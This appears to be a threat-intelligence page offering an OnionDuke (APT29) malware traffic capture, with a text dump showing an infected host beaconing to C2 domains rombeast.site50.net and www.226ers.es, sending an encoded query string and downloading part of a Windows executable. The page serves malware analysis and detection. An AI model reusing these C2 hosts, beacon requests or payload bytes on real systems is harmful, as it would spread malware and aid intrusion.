OnionDuke APT Malware Traffic Sample PCAP Download


Acronis Cyber Protect

OnionDuke

OnionDuke is malware that was used by APT29 from 2013 to 2015.

APT29 is threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).[1][2] They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015.[3][4][5][6]

In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to APT29, Cozy Bear, and The Dukes.[7][8] Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.

1970-01-01 -4:-58:-32.468345 IP 10.0.2.15.1025 > 10.0.2.2.53: 56315+ A? rombeast.site50.net. (37)
E..A.q….”+

……5.-……………rombeast.site50.net…..
1970-01-01 -4:-58:-32.492920 IP 10.0.2.2.53 > 10.0.2.15.1025: 56315 1/2/0 A 31.170.162.243 (103)
E…./..@.b+

….5…o\…………..rombeast.site50.net…………..X…………..Q….ns2
000webhost.com………Q….ns1.E
1970-01-01 -4:-58:-32.496438 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [S], seq 3752956870, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.r@…+.
……….P……..p…A………..
1970-01-01 -4:-58:-32.595297 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [S.], seq 64001, ack 3752956871, win 65535, options [mss 1460], length 0
E..,.0..@…….
….P……….`…W…….
1970-01-01 -4:-58:-32.595497 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [.], ack 1, win 64240, length 0
E..(.s@…+.
……….P……..P…tS……..
1970-01-01 -4:-58:-32.595729 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [P.], seq 1:289, ack 1, win 64240, length 288: HTTP: GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
E..H.t@…*.
……….P……..P…R1..GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

1970-01-01 -4:-58:-32.595780 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [.], ack 289, win 65535, length 0
E..(.1..@…….
….P……….P…n$..
1970-01-01 -4:-58:-32.866662 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [P.], seq 1:1408, ack 289, win 65535, length 1407: HTTP: HTTP/1.1 200 OK
E….2..@..s….
….P……….P…….HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 1243
Connection: close
Content-Type: text/html

1970-01-01 -4:-58:-32.875339 IP 10.0.2.15.1025 > 10.0.2.2.53: 6529+ A? www.226ers.es. (31)
E..;.w….”+

……5.’……………www.226ers.es…..
1970-01-01 -4:-58:-31.093371 IP 10.0.2.2.53 > 10.0.2.15.1025: 6529 1/3/0 A 208.113.199.191 (114)
E….5..@.b.

….5…z.4………….www.226ers.es………….8@…q……….Q….ns1 dreamhost.com………Q….ns2.?……..Q….ns3.?
1970-01-01 -4:-58:-31.093919 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [S], seq 1505536384, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.x@…V.
….q…..PY…….p….H……….
1970-01-01 -4:-58:-31.181729 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [S.], seq 192001, ack 1505536385, win 65535, options [mss 1460], length 0
E..,.6..@..V.q..
….P……Y…`….+……
1970-01-01 -4:-58:-31.184827 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [.], ack 1, win 64240, length 0
E..(.y@…V.
….q…..PY…….P………….
1970-01-01 -4:-58:-31.185054 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [P.], seq 1:147, ack 1, win 64240, length 146: HTTP: GET /sysinfo_7.php HTTP/1.1
E….z@…U.
….q…..PY…….P….B..GET /sysinfo_7.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.226ers.es
Cache-Control: no-cache

1970-01-01 -4:-58:-31.185134 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [.], ack 147, win 65535, length 0
E..(.7..@..Y.q..
….P……Y…P….W..
1970-01-01 -4:-58:-31.274162 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [P.], seq 1:533, ack 147, win 65535, length 532: HTTP: HTTP/1.1 503 Service Temporarily Unavailable
E..<.8..@..D.q..
….P……Y…P….W..HTTP/1.1 503 Service Temporarily Unavailable
Date: Wed, 18 Dec 2013 03:52:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

503 Service Temporarily Unavailable

Service Temporarily Unavailable

The server is temporarily unable to service your
request due to maintenance downtime or capacity
problems. Please try again later.

1970-01-01 -4:-58:-31.400301 IP 10.0.2.15.1050 > 31.170.162.243.80: Flags [P.], seq 1:163, ack 1, win 64240, length 162: HTTP: GET /forum/phpBB3/prx_26.php HTTP/1.1
E…..@…+.
……….P.1……P…….GET /forum/phpBB3/prx_26.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

1970-01-01 -4:-58:-31.400374 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], ack 163, win 65535, length 0
E..(.<..@……. ….P…….1.rP…y… 1970-01-01 -4:-58:-31.610731 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [P.], seq 1:171, ack 163, win 65535, length 170: HTTP: HTTP/1.1 200 OK
E….=..@..=….
….P…….1.rP….d..HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

1970-01-01 -4:-58:-31.616302 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], seq 171:1591, ack 163, win 65535, length 1420: HTTP
E….>..@..Z….
….P…….1.rP…….27400
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………A…/D../D../D&..D../D…D../D…D../D…D../D…D../D…D../D…D1./D…D../D…D../D…D../DRich../D……..PE..L…!..R………..!..
………….%8…………………………………………….@……………………..>…….4..x………………………………………………………….H…@……………………………………..text…X……………………… ..`.rdata…_…….`………………@..@.data….6…@………………….@….reloc..v-………..F…………..@..B…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….U…E..V….X…t V.3……..^]………………A……………A…………..U…..H….R,P.E.P..]………………………U..V…………..E..t V……….^]……………………….U…F..M.;.s4…U.;.w+W..+….;F.u………F…t…….._.F..]…;F.u….c….F…t..M….F..]……………….I..A.+………U..j.h….d…..PQV..@..3.P.E.d……..u…`….E……F…t.P.-…..



Leave a Comment